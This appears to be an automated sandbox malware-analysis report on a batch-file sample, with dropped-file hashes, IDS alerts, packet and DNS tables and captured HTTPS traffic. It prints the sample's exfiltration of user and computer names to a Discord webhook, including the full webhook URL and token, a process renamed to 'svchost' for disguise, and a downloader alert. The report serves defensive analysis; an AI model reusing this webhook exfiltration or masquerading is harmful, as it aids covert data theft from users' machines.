                                                                                                                            SHA-256:11B43268CD40D2EBE4A499561AD4EEC66BE168195B5E8CAF2D6BB3D47240EAEC
                                                                                                                            SHA-512:9A06AED2030F9245F2DD2470A00264D26EA1180DEE892BA942E265908386BFAA53B128FB47463BE5E44E56D4E71C982696509CABC6772BFB89AEAE826716E429
                                                                                                                            Malicious:false
                                                                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                            File Type:JSON data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):55
                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                            Malicious:false
                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                            \Device\Null

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):362
                                                                                                                            Entropy (8bit):4.700364655615608
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:EI8CLXWqSRMRo2Wa7zWCFnoc2A4SzERV1WENUMZhTv:EI8CLWqTona7zWCpvzEX1W+Nvj
                                                                                                                            MD5:F14784C1C7E18502AD7BC0D8ED0649EE
                                                                                                                            SHA1:749CD2F46F31A17499F2C3AB29E3BF661E45871B
                                                                                                                            SHA-256:BEF92178A9D6B683B53C32082F380BBB3B41F6652DA55712CBDCCC013D16927E
                                                                                                                            SHA-512:CDCAB04918F88DF054BC1B7EEF57BC97CCE30CF0D58006E42E8DFAD27644E4B7076785E7645FC3C004EB914E7ECAABF53FF314C93FFE58E83A38D3D2D88AA6AD
                                                                                                                            Malicious:false
                                                                                                                            Preview:False..True..'ProcessName' is a ReadOnly property...At line:1 char:588..+ ... ingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : InvalidOperation: (:) [], RuntimeException.. + FullyQualifiedErrorId : PropertyAssignmentException.. ..

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:DOS batch file, ASCII text, with very long lines (659), with CRLF line terminators
                                                                                                                            Entropy (8bit):6.069483177704481
                                                                                                                            TrID:
                                                                                                                              File name:main.bat.bin.bat
                                                                                                                              File size:109'378 bytes
                                                                                                                              MD5:e9586e0e3590d13cc5a4c413b18efd12
                                                                                                                              SHA1:697e5683ea6cc8a640d88959e893bf19e264aba4
                                                                                                                              SHA256:d0dd54a04d8c0ec90877013ed6314793ce52537f72143c35bdc2646c26dd3fae
                                                                                                                              SHA512:2e9eea80fcadb0e315de62f2bf0ce973470712147af7df4a1b80a32ac2a0a31096b7e3b88cd8adf9bd4aac70b1d8482bfae47b3e0c8ae5eeb738573601ec35fa
                                                                                                                              SSDEEP:3072:wHzoRbKdUOGbarWuUsYFrEj9Jx945oT+Qwbxycc4uxNwq:E4lOJrW7DRE7goKQkhc4uvJ
                                                                                                                              TLSH:17B3F17868DD734C1912F4AFF744A486BBC9066F42831B05722CCA297BF44BD2B91D9B
                                                                                                                              File Content Preview:@echo off....setlocal EnableDelayedExpansion....REM Set user and computer information..set "User=%USERNAME%"..set "ComputerName=%COMPUTERNAME%"....REM Define Discord Webhook URL..set "WebhookURL=https://discord.com/api/webhooks/1292044762974785547/-sVDk3i

                                                                                                                              File Icon

                                                                                                                              Icon Hash:9686878b929a9886

                                                                                                                              Network Behavior

                                                                                                                              Suricata IDS Alerts

                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-10-06T13:37:33.646580+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.864901185.199.108.153443TCP

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 6, 2024 13:36:06.451499939 CEST49707443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:06.451534033 CEST44349707162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:06.451687098 CEST49707443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:06.496603966 CEST49707443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:06.496623993 CEST44349707162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:06.977086067 CEST44349707162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:06.977221966 CEST49707443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:07.000583887 CEST49707443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:07.000614882 CEST44349707162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:07.001049042 CEST44349707162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:07.003595114 CEST49707443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:07.047451019 CEST44349707162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:07.151778936 CEST44349707162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:07.151927948 CEST44349707162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:07.152144909 CEST49707443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:07.173063040 CEST49707443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:07.173090935 CEST44349707162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:07.886632919 CEST49710443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:07.886696100 CEST44349710162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:07.886768103 CEST49710443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:07.895323992 CEST49710443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:07.895351887 CEST44349710162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:08.376542091 CEST44349710162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:08.376626968 CEST49710443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:08.378149033 CEST49710443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:08.378163099 CEST44349710162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:08.378448963 CEST44349710162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:08.381134033 CEST49710443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:08.423404932 CEST44349710162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:08.581942081 CEST44349710162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:08.582055092 CEST44349710162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:08.582187891 CEST49710443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:08.588017941 CEST49710443192.168.2.8162.159.137.232
                                                                                                                              Oct 6, 2024 13:36:08.588036060 CEST44349710162.159.137.232192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:27.865860939 CEST64892443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:27.865906954 CEST44364892162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:27.866054058 CEST64892443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:27.885365009 CEST64892443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:27.885390043 CEST44364892162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:28.378957987 CEST44364892162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:28.379045010 CEST64892443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:28.384465933 CEST64892443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:28.384485006 CEST44364892162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:28.384852886 CEST44364892162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:28.395589113 CEST64892443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:28.439400911 CEST44364892162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:28.553189993 CEST44364892162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:28.553448915 CEST44364892162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:28.553606987 CEST64892443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:28.577461004 CEST64892443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:28.577500105 CEST44364892162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:30.042697906 CEST64897443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:30.042764902 CEST44364897162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:30.042972088 CEST64897443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:30.198647976 CEST64897443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:30.198724031 CEST44364897162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:30.694663048 CEST44364897162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:30.694745064 CEST64897443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:30.696676016 CEST64897443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:30.696702003 CEST44364897162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:30.697540998 CEST44364897162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:30.700623989 CEST64897443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:30.743402958 CEST44364897162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:30.869401932 CEST44364897162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:30.869715929 CEST44364897162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:30.869784117 CEST64897443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:30.955557108 CEST64897443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:30.955610991 CEST44364897162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:32.996743917 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:32.996834993 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:32.997545004 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.028844118 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.028875113 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.497859955 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.497999907 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.502350092 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.502383947 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.502638102 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.518043041 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.559406042 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.646600008 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.646691084 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.646770000 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.646800041 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.647084951 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.647130013 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.647135973 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.647146940 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.647197008 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.647206068 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.647479057 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.647831917 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.647840977 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.651431084 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.651477098 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.651500940 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.651532888 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.651576042 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.651606083 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.709163904 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.709192991 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735368967 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735409975 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735444069 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735455990 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.735497952 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735536098 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.735557079 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735589981 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735604048 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.735620975 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735701084 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735753059 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.735755920 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735768080 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735796928 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.735833883 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.735881090 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.735898018 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.736613989 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.736653090 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.736684084 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.736711979 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.736712933 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.736725092 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.736737013 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.736793041 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.736807108 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.737571001 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.737602949 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.737641096 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.737643957 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.737658024 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.737709045 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.737723112 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.737781048 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.824117899 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.824131012 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.824182987 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.824239016 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.824296951 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.824327946 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.824351072 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.825649977 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.825695038 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.825727940 CEST44364901185.199.108.153192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:33.825762987 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.825794935 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:33.879122972 CEST64901443192.168.2.8185.199.108.153
                                                                                                                              Oct 6, 2024 13:37:39.345514059 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.345573902 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.345774889 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.348459005 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.348478079 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.804754972 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.804827929 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.806220055 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.806230068 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.806458950 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.812846899 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.855391979 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.918857098 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:39.920738935 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:39.920768023 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:40.053556919 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:40.053653002 CEST44364913162.159.128.233192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:40.054060936 CEST64913443192.168.2.8162.159.128.233
                                                                                                                              Oct 6, 2024 13:37:40.061327934 CEST64913443192.168.2.8162.159.128.233

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Oct 6, 2024 13:36:06.417610884 CEST5747453192.168.2.81.1.1.1
                                                                                                                              Oct 6, 2024 13:36:06.424930096 CEST53574741.1.1.1192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:44.185844898 CEST5357644162.159.36.2192.168.2.8
                                                                                                                              Oct 6, 2024 13:36:44.702611923 CEST5169653192.168.2.81.1.1.1
                                                                                                                              Oct 6, 2024 13:36:44.710079908 CEST53516961.1.1.1192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:27.707142115 CEST6091953192.168.2.81.1.1.1
                                                                                                                              Oct 6, 2024 13:37:27.805810928 CEST53609191.1.1.1192.168.2.8
                                                                                                                              Oct 6, 2024 13:37:31.789787054 CEST5087753192.168.2.81.1.1.1
                                                                                                                              Oct 6, 2024 13:37:32.979408979 CEST6200853192.168.2.81.1.1.1
                                                                                                                              Oct 6, 2024 13:37:32.990900040 CEST53620081.1.1.1192.168.2.8

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Oct 6, 2024 13:36:06.417610884 CEST192.168.2.81.1.1.10x2d44Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:36:44.702611923 CEST192.168.2.81.1.1.10xe0a7Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:27.707142115 CEST192.168.2.81.1.1.10xd367Standard query (0)ptb.discord.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:31.789787054 CEST192.168.2.81.1.1.10xc2e1Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:32.979408979 CEST192.168.2.81.1.1.10x438bStandard query (0)diva.inkA (IP address)IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Oct 6, 2024 13:36:06.424930096 CEST1.1.1.1192.168.2.80x2d44No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:36:06.424930096 CEST1.1.1.1192.168.2.80x2d44No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:36:06.424930096 CEST1.1.1.1192.168.2.80x2d44No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:36:06.424930096 CEST1.1.1.1192.168.2.80x2d44No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:36:06.424930096 CEST1.1.1.1192.168.2.80x2d44No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:36:36.048624039 CEST1.1.1.1192.168.2.80x5304No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:36:36.048624039 CEST1.1.1.1192.168.2.80x5304No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:36:44.710079908 CEST1.1.1.1192.168.2.80xe0a7Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:24.491537094 CEST1.1.1.1192.168.2.80x4dbcNo error (0)windowsupdatebg.s.llnwi.net178.79.238.128A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:24.491537094 CEST1.1.1.1192.168.2.80x4dbcNo error (0)windowsupdatebg.s.llnwi.net178.79.238.0A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:27.805810928 CEST1.1.1.1192.168.2.80xd367No error (0)ptb.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:27.805810928 CEST1.1.1.1192.168.2.80xd367No error (0)ptb.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:27.805810928 CEST1.1.1.1192.168.2.80xd367No error (0)ptb.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:27.805810928 CEST1.1.1.1192.168.2.80xd367No error (0)ptb.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:27.805810928 CEST1.1.1.1192.168.2.80xd367No error (0)ptb.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:31.797068119 CEST1.1.1.1192.168.2.80xc2e1No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:32.990900040 CEST1.1.1.1192.168.2.80x438bNo error (0)diva.ink185.199.108.153A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:32.990900040 CEST1.1.1.1192.168.2.80x438bNo error (0)diva.ink185.199.111.153A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:32.990900040 CEST1.1.1.1192.168.2.80x438bNo error (0)diva.ink185.199.110.153A (IP address)IN (0x0001)false
                                                                                                                              Oct 6, 2024 13:37:32.990900040 CEST1.1.1.1192.168.2.80x438bNo error (0)diva.ink185.199.109.153A (IP address)IN (0x0001)false

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • discord.com
                                                                                                                              • ptb.discord.com
                                                                                                                              • diva.ink

                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.849707162.159.137.2324433700C:\Windows\System32\curl.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-06 11:36:07 UTC229OUTPOST /api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz HTTP/1.1
                                                                                                                              Host: discord.com
                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 47
                                                                                                                              2024-10-06 11:36:07 UTC47OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 55 73 65 72 3a 20 68 75 62 65 72 74 2c 20 43 6f 6d 70 75 74 65 72 3a 20 48 55 42 45 52 54 2d 50 43 22 7d
                                                                                                                              Data Ascii: {"content":"User: user, Computer: user-PC"}
                                                                                                                              2024-10-06 11:36:07 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sun, 06 Oct 2024 11:36:07 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 45
                                                                                                                              Connection: close
                                                                                                                              set-cookie: __dcfduid=2d2e4b4e83d711efbbb5069e833022f9; Expires=Fri, 05-Oct-2029 11:36:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                              x-ratelimit-limit: 5
                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                              x-ratelimit-reset: 1728214568
                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                              via: 1.1 google
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YGklYx1d2cW8BhgkyRVfbOYioO2vcAIqF2jAmrfbgQ%2B2UkIwFApw7DcJAiHc4J6eu5ZqmbonDzDZEOHQXdTjyKnZrbUXYuAaPS7XyqtOxWKaV%2BUZ0MCGesKq2e9l"}],"group":"cf-nel","max_age":604800}
